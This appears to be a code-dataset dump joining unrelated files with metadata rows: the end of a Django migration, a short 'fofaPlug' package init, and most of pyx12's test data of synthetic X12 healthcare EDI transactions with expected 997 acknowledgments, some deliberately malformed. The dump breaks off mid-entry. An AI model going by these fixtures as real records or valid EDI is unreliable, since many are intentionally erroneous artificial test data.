migrations.AlterField(
model_name='inventoryline',
name='product_unique',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryline', to='codenerix_products.ProductUnique', verbose_name='Product Unique'),
),
]
| 62.780488 | 233 | 0.646594 | 772 | 7,722 | 6.264249 | 0.145078 | 0.081886 | 0.049214 | 0.077337 | 0.867866 | 0.867866 | 0.824235 | 0.797353 | 0.773987 | 0.773987 | 0 | 0.00809 | 0.215618 | 7,722 | 122 | 234 | 63.295082 | 0.790325 | 0.008806 | 0 | 0.608696 | 1 | 0 | 0.248726 | 0.107568 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.026087 | 0 | 0.052174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fd5c4f969531a4015905e7b257fb9df09b0d730e | 68 | py | Python | fofaPlug/__init__.py | Yingsame/mysearch | 73c9bdbf850cb839865106c2c71bf302178b1742 | [
"Unlicense"
] | 1 | 2021-08-28T17:54:45.000Z | 2021-08-28T17:54:45.000Z | fofaPlug/__init__.py | Yingsame/mysearch | 73c9bdbf850cb839865106c2c71bf302178b1742 | [
"Unlicense"
] | null | null | null | fofaPlug/__init__.py | Yingsame/mysearch | 73c9bdbf850cb839865106c2c71bf302178b1742 | [
"Unlicense"
] | null | null | null | from fofaPlug import vip_cookies
from fofaPlug import download_Data | 34 | 34 | 0.882353 | 10 | 68 | 5.8 | 0.7 | 0.413793 | 0.62069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 68 | 2 | 34 | 34 | 0.966667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fd62b12d98ee3be879d3247047523549820dd3da | 50,985 | py | Python | pyx12/test/x12testdata.py | arenius/pyx12 | 537493deaa0b8e18a3fa72eb1b3eeae9ef043b11 | [
"BSD-3-Clause"
] | 120 | 2015-01-30T07:17:26.000Z | 2022-03-25T16:42:15.000Z | pyx12/test/x12testdata.py | arenius/pyx12 | 537493deaa0b8e18a3fa72eb1b3eeae9ef043b11 | [
"BSD-3-Clause"
] | 43 | 2015-02-12T18:42:26.000Z | 2021-12-12T22:22:20.000Z | pyx12/test/x12testdata.py | arenius/pyx12 | 537493deaa0b8e18a3fa72eb1b3eeae9ef043b11 | [
"BSD-3-Clause"
] | 85 | 2015-02-12T16:44:28.000Z | 2022-03-24T20:20:46.000Z | datafiles = {
'834_lui_id': {
'source': """ISA*00* *00* *ZZ*D00XXX *ZZ*00AA *070305*1832*U*00401*000701336*0*P*:~
GS*BE*D00XXX*00AA*20070305*1832*13360001*X*004010X095A1~
ST*834*0001~
BGN*00*88880070301 00*20070305*181245****4~
DTP*007*D8*20070301~
N1*P5*PAYER 1*FI*999999999~
N1*IN*KCMHSAS*FI*999999999~
INS*Y*18*030*XN*A*C**FT~
REF*0F*00389999~
REF*1L*000003409999~
REF*3H*K129999A~
DTP*356*D8*20070301~
NM1*IL*1*DOE*JOHN*A***34*999999999~
N3*777 ELM ST~
N4*ALLEGAN*MI*49010**CY*03~
DMG*D8*19670330*M**O~
LUI***ESSPANISH~
HD*030**AK*064703*IND~
DTP*348*D8*20070301~
AMT*P3*45.34~
REF*17*E 1F~
SE*20*0001~
GE*1*13360001~
IEA*1*000701336~
""",
'res997': """ISA*00* *00* *ZZ*00GR *ZZ*D00111 *070320*1721*U*00401*703201721*0*P*:~
GS*FA*00GR*D00111*20070320*172121*13360001*X*004010~
ST*997*0001~
AK1*BE*13360001~
AK2*834*0001~
AK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*13360001~
IEA*1*703201721~
"""},
'835id': {
'res997': """ISA*00* *00* *ZZ*382999999 *ZZ*383319999 *090304*1036*U*00401*903041036*1*P*:~
GS*FA*382999999*383319999*20090304*103618*3444*X*004010~
ST*997*0001~
AK1*HP*3444~
AK2*835*40731~
AK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*3444~
TA1*000003447*090220*1816*A*000~
IEA*1*903041036~
""",
'source': """ISA*00* *00* *ZZ*383319999 *ZZ*382999999 *090220*1816*U*00401*000003447*1*P*:~
GS*HP*383319999*382999999*20090220*1816*3444*X*004010X091A1~
ST*835*40731~
BPR*I*5950.21*C*CHK************20090220~
TRN*1*0004926*1382999999~
DTM*405*20090209~
N1*PR*Payer 1~
N3*123 Elm~
N4*Nowhere*MI*49000~
N1*PE*Provider 1*FI*382999999~
N3*456 Oak~
N4*Nowhere*MI*49000~
LX*1~
CLP*123839-24635*22*-310*-210*0*HM*6363451~
NM1*QC*1*Flintstone*Fred****34*373899999~
AMT*AU*580~
SVC*HC:T1017*-310*-210**6~
DTM*150*20080111~
CAS*CR*45*-100~
REF*G1*20540~
CLP*123839-24635*1*300*200*0*HM*6363451~
NM1*QC*1*Flintstone*Fred****34*373899999~
AMT*AU*590~
SVC*HC:T1017*300*200**6~
DTM*150*20080111~
CAS*CR*45*100~
REF*G1*20540~
CLP*134158-27488*22*-500.25*-500.25*0*HM*6397645~
NM1*QC*1*Rubble*Barney****34*376899999~
AMT*AU*595~
SVC*HC:T1017:TG*-500.25*-500.25**6~
DTM*150*20080402~
REF*G1*20908~
PLB*382999999*20090930*CS*-1008.1*CS*24.21*CS*5.95~
SE*33*40731~
GE*1*3444~
IEA*1*000003447~
"""},
'837miss': {
'res997': """ISA*00* *00* *ZZ*ZZ001 *ZZ*ZZ000 *041211*1902*U*00401*412111902*1*T*:~
GS*FA*ZZ001*ZZ000*20041211*190228*17*X*004010~
ST*997*0001~
AK1*HC*17~
AK2*837*11280001~
AK5*R*2~
AK9*R*0*0*0*3~
SE*6*0001~
GE*1*17~
TA1*000010121*030828*1128*R*023~
IEA*1*412111902~
""",
'source': """ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010121*1*T*:~
GS*HC*ZZ000*ZZ001*20030828*1128*17*X*004010X098A1~
ST*837*11280001~"""
},
'mult_isa': {
'res997': """ISA*00* *00* *ZZ*ZZ001 *ZZ*ZZ000 *070328*1628*U*00401*703281628*0*T*:~
GS*FA*00GR*D00111*20070328*162824*383880001*X*004010~
ST*997*0001~
AK1*HI*17~
AK2*278*11280001~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280002~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280003~
AK3*HL*2**3~
AK5*R*5~
AK9*R*3*3*0~
SE*13*0001~
ST*997*0002~
AK1*HC*18~
AK2*837*11280001~
AK3*REF*2**3~
AK3*NM1*2**3~
AK3*NM1*2**3~
AK3*HL*2**3~
AK5*R*5~
AK9*R*1*1*0~
SE*10*0002~
ST*997*0003~
AK1*HP*383880001~
AK2*835*0001~
AK3*BPR*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0003~
ST*997*0004~
AK1*HP*2~
AK2*835*0001~
AK3*BPR*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0004~
ST*997*0005~
AK1*HP*3~
AK2*835*0001~
AK3*BPR*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0005~
ST*997*0006~
AK1*HI*17~
AK2*278*11280001~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280002~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280003~
AK3*HL*2**3~
AK5*R*5~
AK9*R*3*3*0~
SE*13*0006~
ST*997*0007~
AK1*HC*18~
AK2*837*11280001~
AK3*REF*2**3~
AK3*NM1*2**3~
AK3*NM1*2**3~
AK3*HL*2**3~
AK5*R*5~
AK9*R*1*1*0~
SE*10*0007~
ST*997*0008~
AK1*HP*383880001~
AK2*835*0001~
AK3*BPR*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0008~
GE*8*383880001~
IEA*1*703281628~""",
'source': """ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010125*0*T*:~
GS*HI*ZZ000*ZZ001*20030828*1128*17*X*004010X094A1~
ST*278*11280001~
BHT*0078*11*121231*20050802*1202~
SE*3*11280001~
ST*278*11280002~
BHT*0078*13*121231*20050802*1202~
SE*3*11280002~
ST*278*11280003~
BHT*0078*11*121231*20050802*1202~
SE*3*11280003~
GE*3*17~
GS*HC*ZZ000*ZZ001*20030828*1128*18*X*004010X098A1~
ST*837*11280001~
BHT*0019*00*121231*20050802*1202*CH~
SE*3*11280001~
GE*1*18~
GS*HP*D00111*00GR*20041028*1609*383880001*X*004010X091A1~
ST*835*0001~
SE*2*0001~
GE*1*383880001~
GS*HP*D00111*00GR*20041028*1609*2*X*004010X091A1~
ST*835*0001~
SE*2*0001~
GE*1*2~
GS*HP*D00111*00GR*20041028*1609*3*X*004010X091A1~
ST*835*0001~
SE*2*0001~
GE*1*3~
IEA*5*000010125~
ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010121*0*T*:~
GS*HI*ZZ000*ZZ001*20030828*1128*17*X*004010X094A1~
ST*278*11280001~
BHT*0078*11*121231*20050802*1202~
SE*3*11280001~
ST*278*11280002~
BHT*0078*13*121231*20050802*1202~
SE*3*11280002~
ST*278*11280003~
BHT*0078*11*121231*20050802*1202~
SE*3*11280003~
GE*3*17~
GS*HC*ZZ000*ZZ001*20030828*1128*18*X*004010X098A1~
ST*837*11280001~
BHT*0019*00*121231*20050802*1202*CH~
SE*3*11280001~
GE*1*18~
GS*HP*D00111*00GR*20041028*1609*383880001*X*004010X091A1~
ST*835*0001~
SE*2*0001~
GE*1*383880001~
IEA*3*000010121~"""
},
'trailer_errors':
{
'res997': """ISA*00* *00* *ZZ*ENCOUNTER *ZZ*00HP *041206*1224*U*00401*412061224*0*P*:~
GS*FA*ENCOUNTER*00HP*20041206*122452*1*X*004010~
ST*997*0001~
AK1*HC*1~
AK2*837*300207436~
AK5*R*4~
AK2*837*300207437~
AK5*A~
AK9*R*2*2*1*4~
SE*8*0001~
GE*1*1~
TA1*000484950*040820*1133*R*018~
IEA*1*412061224~""",
'source': """ISA*00* *00* *ZZ*00HP *ZZ*ENCOUNTER *040820*1133*U*00401*000484950*1*P*:~
GS*HC*00HP*ENCOUNTER*20040820*1133*1*X*004010X096A1~
ST*837*300207436~
BHT*0019*00*300207436*20040820*1133*RP~
REF*87*004010X096A1~
NM1*41*2*SENDER 1*****46*00HP~
PER*IC*CONTACT 1*TE*8005557487~
NM1*40*2*RECEIVER 1*****46*D00111~
HL*1**20*1~
NM1*85*2*BILLING PROVIDER 1*****24*445556666~
N3*456 MAIN STREET~
N4*THREE RIVERS*MI*49093~
REF*1D*1708146~
HL*2*1*22*0~
SBR*S*18*******MC~
NM1*IL*1*MANN*MICHAEL****MI*11331122~
N3*123 ELM STRET~
N4*BURR OAK*MI*49030~
DMG*D8*19950801*M~
REF*SY*363121212~
NM1*PR*2*MDCH*****PI*D00111~
N3*PO BOX 4321~
N4*LANSING*MI*48909~
CLM*1309590*0***11:A:1*Y*A*Y*A*********N~
DTP*434*RD8*20040618-20040623~
DTP*435*DT*200406180800~
CL1*9*9*09~
CN1*05~
HI*BK:31389*BJ:31389~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*ST JOSEPH COUNTY CMH~
PRV*RP*ZZ*101Y00000X~
N3*456 MAIN STREET~
N4*THREE RIVERS*MI*49093~
SBR*P*18**KALAMAZOO CMH*****MC~
AMT*B6*632.5000~
DMG*D8*19950801*M~
OI***Y***I~
NM1*IL*1*MANN*MICHAEL****MI*00000006632~
N3*123 ELM STRET~
N4*BURR OAK*MI*49030~
NM1*PR*2*KALAMAZOO CMH*****PI*174456543~
DTP*573*D8*20040816~
REF*F8*1309590~
SBR*T*18**SENDER 1 HEALTH*****MC~
AMT*B6*632.5000~
DMG*D8*19950801*M~
OI***Y***I~
NM1*IL*1*MANN*MICHAEL****MI*00000006632~
N3*123 ELM STRET~
N4*BURR OAK*MI*49030~
NM1*PR*2*SENDER 1*****PI*174454370~
REF*F8*1309590~
LX*1~
SV2*0100**0*UN*5*0*0~
DTP*472*RD8*20040618-20040623~
SVD*174456543*0**0100*5~
DTP*573*D8*20040816~
SE*60*300207436~
ST*837*300207437~
BHT*0019*00*300207437*20040820*1133*RP~
REF*87*004010X096A1~
NM1*41*2*SENDER 1*****46*00HP~
PER*IC*CONTACT 1*TE*8005557487~
NM1*40*2*RECEIVER 1*****46*D00111~
HL*1**20*1~
NM1*85*2*BILLING PROVIDER 1*****24*445556666~
N3*456 MAIN STREET~
N4*THREE RIVERS*MI*49093~
REF*1D*1708146~
HL*2*1*22*0~
SBR*S*18*******MC~
NM1*IL*1*WAHL*JAMES****MI*12341234~
N3*MT PLEASANT CENTER*1400 W MAIN~
N4*MT. PLEASANT*MI*48858~
DMG*D8*19750704*M~
REF*SY*374121234~
NM1*PR*2*MDCH*****PI*D00111~
N3*PO BOX 4321~
N4*LANSING*MI*48909~
CLM*1304171*0***11:A:1*Y*A*Y*A*********N~
DTP*434*RD8*20040601-20040701~
DTP*435*DT*200406010800~
CL1*9*9*09~
CN1*05~
HI*BK:31234*BJ:31234~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*ST JOSEPH COUNTY CMH~
PRV*RP*ZZ*101Y00000X~
N3*456 MAIN STREET~
N4*THREE RIVERS*MI*49093~
SBR*P*18**KALAMAZOO CMH*****MC~
AMT*B6*216.7000~
DMG*D8*19750704*M~
OI***Y***I~
NM1*IL*1*WAHL*JAMES****MI*00000000043~
N3*MT PLEASANT CENTER*1400 W MAIN~
N4*MT. PLEASANT*MI*48858~
NM1*PR*2*KALAMAZOO CMH*****PI*174456543~
DTP*573*D8*20040719~
REF*F8*1304171~
SBR*T*18**SENDER 1 HEALTH*****MC~
AMT*B6*216.7000~
DMG*D8*19750704*M~
OI***Y***I~
NM1*IL*1*WAHL*JAMES****MI*00000000043~
N3*MT PLEASANT CENTER*1400 W MAIN~
N4*MT. PLEASANT*MI*48858~
NM1*PR*2*SENDER 1*****PI*174454370~
REF*F8*1304171~
LX*1~
SV2*0100**0*UN*30*0*0~
DTP*472*RD8*20040601-20040701~
SVD*174456543*0**0100*30~
DTP*573*D8*20040719~
SE*59*300207437~
GE*2*333~
IEA*5*333~"""
},
'trailing_terms': {
'res997': """ISA*00* *00* *ZZ*0000BBB *ZZ*00000AAA *070319*1742*U*00401*703191742*0*P*:~
GS*FA*0BBB*0AAA*20070319*174249*1*X*004010~
ST*997*0001~
AK1*HC*1~
AK2*837*300145997~
AK3*CLM*22**8~
AK4*18*1073*1~
AK5*R*5~
AK9*R*1*1*0~
SE*8*0001~
GE*1*1~
IEA*1*703191742~""",
'source': """ISA*00* *00* *ZZ*00000AAA *ZZ*0000BBB *040709*1439*U*00401*000484889*0*P*:~
GS*HC*0AAA*0BBB*20040709*1439*1*X*004010X096A1~
ST*837*300145997~
BHT*0019*00*300145997*20040709*1439*RP~
REF*87*004010X096A1~
NM1*41*2*PROVIDER 1*****46*0AAA~
PER*IC*HELPDESK*EM*ADMIN@NULL.NULL*TE*8005557444~
NM1*40*2*RECEIVER 1*****46*000111~
HL*1**20*1~
NM1*85*2*PROVIDER 1*****24*555112222~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
REF*1D*1705555~
HL*2*1*22*0~
SBR*S*18*******11~
NM1*IL*1*ARNOLD*TOM****MI*666333444~
N3*5324 ELM~
N4*STURGIS*MI*49091~
DMG*D8*19270312*M~
REF*SY*666333444~
NM1*PR*2*PAYER 2*****PI*000111~
N3*PO BOX 0000~
N4*KALAMAZOO*MI*48001~
CLM*12522228*0***11:A:7*Y*A*Y*A********~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
LX*1~
SV2*0100**0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SE*38*300145997~
GE*1*1~
IEA*1*000484889~"""
},
'bad_2010AA_bug': {
'res997': """ISA*00* *00* *ZZ*RECEIVER *ZZ*SENDER *040701*1620*U*00401*407011620*0*P*:~
GS*FA*RECEIVER*SENDER*20040701*162046*56*X*004010~
ST*997*0001~
AK1*HC*56~
AK2*837*000000001~
AK3*NM1*8**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0001~
GE*1*56~
IEA*1*407011620~""",
'source': """ISA*03*SENDER *01* *ZZ*SENDER *ZZ*RECEIVER *040608*1333*U*00401*000000288*0*P*:~
GS*HC*SENDER*RECEIVER*20040608*1333*56*X*004010X098A1~
ST*837*000000001~
BHT*0019*00*289*20040608*1333*CH~
REF*87*004010X098A1~
NM1*41*2*SENDER 1*****46*2309-0923~
PER*IC*Contact Name*TE*1115551111~
NM1*40*2*Payer*****46*21312311~
HL*1**20*1~
HL*2*1*22*0~
SBR*P*18*******11~
NM1*IL*1*GAIMAN*NEIL*M***MI*101911111~
N3*1123 OAKLAND~
N4*VOID*MI*49001~
DMG*D8*19460101*M~
REF*SY*370600001~
NM1*PR*2*PAYER 1*****PI*44-4444444~
N3*4444 ONE RD~
N4*VOID*MI*49001~
CLM*6643-1019AA*14.84***12::1*Y*A*N*Y*B~
HI*BK:29590~
LX*1~
SV1*HC:H2015*14.84*UN*6***1~
DTP*472*D8*20040501~
REF*6R*AKLKJ124231AD~
SE*24*000000001~
GE*1*56~
IEA*1*000000288~"""
},
'elements': {
'res997': """ISA*00* *00* *ZZ*RECEIVER *ZZ*SENDER *070320*0942*U*00401*703200942*0*P*:~
GS*FA*RECEIVER*SENDER*20070320*094249*56*X*004010~
ST*997*0001~
AK1*HC*56~
AK2*837*000000001~
AK3*REF*3**8~
AK4*2*127*7*004010X098A2~
AK3*PER*5**8~
AK4*3*365*7*TA~
AK3*NM1*7**8~
AK4*8*66*7*47~
AK3*NM1*15**8~
AK4*8*66*5*MIM~
AK4*8*66*7*MIM~
AK3*DMG*18**8~
AK4*2*1251*8*19461301~
AK4*3*1068*7*R~
AK3*CLM*23**8~
AK4*5:1*1331*7*95~
AK5*R*4*5~
AK9*R*1*1*0~
SE*20*0001~
GE*1*56~
IEA*1*703200942~""",
'source': """ISA*03*SENDER *01* *ZZ*SENDER *ZZ*RECEIVER *040608*1333*U*00401*000000288*0*P*:~
GS*HC*SENDER*RECEIVER*20040608*1333*56*X*004010X098A1~
ST*837*000000001~
BHT*0019*00*289*20040608*1333*CH~
REF*87*004010X098A2~
NM1*41*2*SENDER 1*****46*2309-0923~
PER*IC*Contact Name*TA*111-555-1111~
PER*IC*Contact Name*TE*111-555-1111~
NM1*40*2*Payer*****47*21312311~
HL*1**20*1~
NM1*85*2*Biller 1*****XX*2309-2222~
N3*1123 MILL~
N4*VOID*MI*49002~
PER*IC*Contact Name*TE*111-555-2222~
HL*2*1*22*0~
SBR*P*18*******11~
NM1*IL*1*GAIMAN*NEIL*MMMM***MIM*101911111~
N3*1123 OAKLAND~
N4*VOID*MI*49001~
DMG*D8*19461301*R~
REF*SY*370600000~
NM1*PR*2*PAYER 1*****PI*44-4444444~
N3*4444 ONE RD~
N4*VOID*MI*49001~
CLM*6643-1019AA*999.6***95::8*Y*A*N*Y*B~
HI*BK:29590~
LX*1~
SV1*HC:H2015*14.84*UN*6***1~
DTP*472*D8*20040501~
REF*6R*AKLKJ124231AD~
SE*30*000000001~
GE*1*56~
IEA*1*000000288~"""
},
'bad_header_looping': {
'res997': """ISA*00* *00* *ZZ*00AA *ZZ*D00000 *070405*0014*U*00401*704050014*0*P*:~
GS*FA*00GR*D00111*20070405*001406*383880001*X*004010~
ST*997*0001~
AK1*HP*383880001~
AK2*835*0001~
AK3*DTM*5**8~
AK4*2*373*8*11111111~
AK3*N1*39**1~
AK3*N3*40**1~
AK3*N4*41**1~
AK3*N1*42**1~
AK5*R*4*5~
AK9*R*1*1*0~
SE*12*0001~
GE*1*383880001~
IEA*1*704050014~""",
'source': """ISA*00* *00* *ZZ*D00000 *ZZ*00AA *041028*1609*U*00401*000238388*0*P*:~
GS*HP*D00111*00GR*20041028*1609*383880001*X*004010X091A1~
ST*835*0001~
BPR*H*0*C*NON************20041028~
TRN*1*000000000*1386000134~
REF*EV*00GR~
DTM*405*11111111~
N1*PR*PAYER~
N3*P.O. BOX 30479~
N4*LANSING*MI*48909~
N1*PE*UNKNOWN*FI*444313000~
LX*1~
TS3*653423424*12*20041231*1*915.39~
CLP*2005555A*4*915.39*0**MC*4276512332~
NM1*QC*1*BACH*JOHANN*S***MR*00001612~
NM1*82*2*PAYEE*****MC*44452736~
SVC*HC:T1005*500.04*0**68~
DTM*150*20031129~
DTM*151*20031129~
CAS*CO*16*500.04~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
SVC*HC:T1005*127.8*0**16~
DTM*150*20031030~
DTM*151*20031030~
CAS*OA*A7*127.8~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
SVC*HC:T1005*287.55*0**36~
DTM*150*20031031~
DTM*151*20031031~
CAS*OA*A7*287.55~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
N1*PR*PAYER~
N3*P.O. BOX 30479~
N4*LANSING*MI*48909~
N1*PE*UNKNOWN*FI*444313000~
LX*1~
TS3*653423424*12*20041231*1*915.39~
CLP*2005555A*4*915.39*0**MC*4276512332~
NM1*QC*1*BACH*JOHANN*S***MR*00001612~
NM1*82*2*PAYEE*****MC*44452736~
SVC*HC:T1005*500.04*0**68~
DTM*150*20031129~
DTM*151*20031129~
CAS*CO*16*500.04~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
SVC*HC:T1005*127.8*0**16~
DTM*150*20031030~
DTM*151*20031030~
CAS*OA*A7*127.8~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
SVC*HC:T1005*287.55*0**36~
DTM*150*20031031~
DTM*151*20031031~
CAS*OA*A7*287.55~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
SE*39*0001~
GE*1*383880001~
IEA*1*000238388~"""
},
'blank1': {
'res997': """ISA*00* *00* *ZZ*0000BBB *ZZ*00000AAA *050721*1643*U*00401*507211643*0*P*:~
GS*FA*0BBB*0AAA*20050721*164347*1*X*004010~
ST*997*0001~
AK1*HC*1~
AK2*837*300145997~
AK3*SV2*57**8~
AK4*2:1*235*7* ~
AK4*2:2*234*1~
AK3*SVD*59**8~
AK4*3:1*235*7* ~
AK4*3:2*234*1~
AK5*R*5~
AK9*R*1*1*0~
SE*12*0001~
GE*1*1~
IEA*1*507211643~""",
'source': """ISA*00* *00* *ZZ*00000AAA *ZZ*0000BBB *040709*1439*U*00401*000484889*0*P*:~
GS*HC*0AAA*0BBB*20040709*1439*1*X*004010X096A1~
ST*837*300145997~
BHT*0019*00*300145997*20040709*1439*RP~
REF*87*004010X096A1~
NM1*41*2*PROVIDER 1*****46*0AAA~
PER*IC*HELPDESK*EM*ADMIN@NULL.NULL*TE*8005557444~
NM1*40*2*RECEIVER 1*****46*000111~
HL*1**20*1~
NM1*85*2*PROVIDER 1*****24*555112222~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
REF*1D*1705555~
HL*2*1*22*0~
SBR*S*18*******11~
NM1*IL*1*ARNOLD*TOM****MI*666333444~
N3*5324 ELM~
N4*STURGIS*MI*49091~
DMG*D8*19270312*M~
REF*SY*666333444~
NM1*PR*2*PAYER 2*****PI*000111~
N3*PO BOX 0000~
N4*KALAMAZOO*MI*48001~
CLM*12522228*0***11:A:7*Y*A*Y*A*********N~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
SBR*T*18**PAYER A*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PAYER A*****PI*552312313~
DTP*573*D8*20040210~
REF*F8*1253278~
SBR*P*18**PROVIDER 1*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PROVIDER 1*****PI*13256235~
REF*F8*1253278~
LX*1~
SV2*0100* :*0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SVD*5222312313*0* :*0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
SE*63*300145997~
GE*1*1~
IEA*1*000484889~"""
},
'ele':
{
'res997': """ISA*00* *00* *ZZ*0000BBB *ZZ*00000AAA *041214*1129*U*00401*412141129*1*P*:~
GS*FA*0BBB*0AAA*20041214*112925*1*X*004010~
ST*997*0001~
AK1*HC*1~
AK2*837*300145997~
AK5*R*3*7~
AK9*R*1*1*0*1~
SE*6*0001~
GE*1*1~
TA1*000484889*040709*3339*R*015~
IEA*1*412141129~""",
'source': """ISA*00* *00* *ZZ*00000AAA *ZZ*0000BBB *040709*3339*U*00401*000484889*1*P*:~
GS*HC*0AAA *0BBB *20040709*1439*1*X*004010X096A1~
ST*837*300145997 ~
BHT*0019*00*300145997*20040709*1439*RP~
REF*87*004010X096A1~
NM1*41*2*PROVIDER 1*****46*0AAA~
PER*IC*HELPDESK*EM*ADMIN@NULL.NULL*TE*8005557444~
NM1*40*2*RECEIVER 1*****46*000111~
HL*1**20*1~
NM1*85*2*PROVIDER 1*****24*555112222~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
REF*1D*1705555~
HL*2*1*22*0~
SBR*S*18*******11~
NM1*IL*1*ARNOLD*TOM****MI*666333444~
N3*5324 ELM~
N4*STURGIS*MI*49091~
DMG*D8*19270312*M~
REF*SY*666333444~
NM1*PR*2*PAYER 2*****PI*000111~
N3*PO BOX 0000~
N4*KALAMAZOO*MI*48001~
CLM*12522228*0***11:A:7*Y*A*Y*A*********N~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
SBR*T*18**PAYER A*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PAYER A*****PI*552312313~
DTP*573*D8*20040210~
REF*F8*1253278~
SBR*P*18**PROVIDER 1*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PROVIDER 1*****PI*13256235~
REF*F8*1253278~
LX*1~
SV2*0100**0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
SE*63*300145997~
GE*1*1~
IEA*1*000484889~"""
},
'fail_no_IEA':
{
'res997': """ISA*00* *00* *ZZ*ZZ001 *ZZ*ZZ000 *040701*1621*U*00401*407011621*0*T*:~
GS*FA*ZZ001*ZZ000*20040701*162104*17*X*004010~
ST*997*0001~
AK1*HC*17~
AK2*837*11280001~
AK3*BHT*1**3~
AK3*HL*1**3~
AK5*R*4*5~
AK9*R*1*1*0~
SE*8*0001~
GE*1*17~
TA1*000010121*030828*1128*R*023~
IEA*1*407011621~""",
'source': """ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010121*1*T*:~
GS*HC*ZZ000*ZZ001*20030828*1128*17*X*004010X098A1~
ST*837*11280001~
SE*0*11280001~
GE*1*17~"""
},
'loop_counting': {
'res997': """ISA*00* *00* *ZZ*BBBBBBBBB *ZZ*AAAAAAAA *041210*0057*U*00401*412100057*1*P*:~
GS*FA*BBBBBBBBB*AAAA*20041210*005722*1167*X*004010~
ST*997*0001~
AK1*HC*1167~
